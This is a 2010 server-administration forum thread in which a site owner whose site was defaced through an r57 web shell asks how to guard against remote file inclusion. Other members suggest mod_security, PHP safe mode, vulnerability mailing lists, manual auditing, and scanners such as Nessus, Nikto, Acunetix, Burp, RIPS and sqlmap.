Security question

Discussion in 'Server Operation' started by bernholdt, Jun 23, 2010.

  1. bernholdt

    bernholdt Member

    I experienced a defacing today on one of my sites. someone managed to get a r57 shell into my site.

    I have modsecurity2, php soushin, suphp, installed as security precautions.

    What else can I do to protect my self against remote file inclusion.

    I am running Debian Lenny with a perfect server setup, from here

    Any hints or ideas ??
    Last edited: Jun 23, 2010
  2. topdog

    topdog Active Member

    A properly configured mod security should be able to ward of most of those attacks, you could also investigate running php in safe mode. The issue with security is that it is a moving target. Keep scanning your applications for security vulnerabilities to keep ahead of the attackers.
  3. bernholdt

    bernholdt Member

    Hi Topdog

    You write Keep scanning your applications for security vulnerabilities to keep ahead of the attackers can you recomend a securityscanner wich i can use to find any holes in this particular script ??
  4. topdog

    topdog Active Member

    Scanning is not just about using automated tools, but good examples are and nessus with the commercial feed.

    You need to subscribe to security vulnerability lists as well, and also do your own application auditing to check applications for XSS, CSRF and other kinds of web vulnerabilities.
  5. Ben

    Ben ISPConfig Developer ISPConfig Developer

    for application scanning you won't be that good with using nessus or nikto, eventhough they can help you as a start.
    it's like doing app pentests, where you have either the choice of doing some kind of black box testing, with automated support (e.g. with acunetix or similar, acunetix for at least detecting xss and crawling is free, you could combine this with other free tools like burp that can help to find more, when letting acunetix crawl through the page) and manual test versus (manual / automated) code review. for php software you could try "rips". I did not use it yet, but the description sounded pretty interesting. Sqlmap for e.g. is interesting for checking sql injections... you will find more tools when googling around for the above, owasp or webappsec (and their mailinglist archives) are a good ressourcepool as well.

Share This Page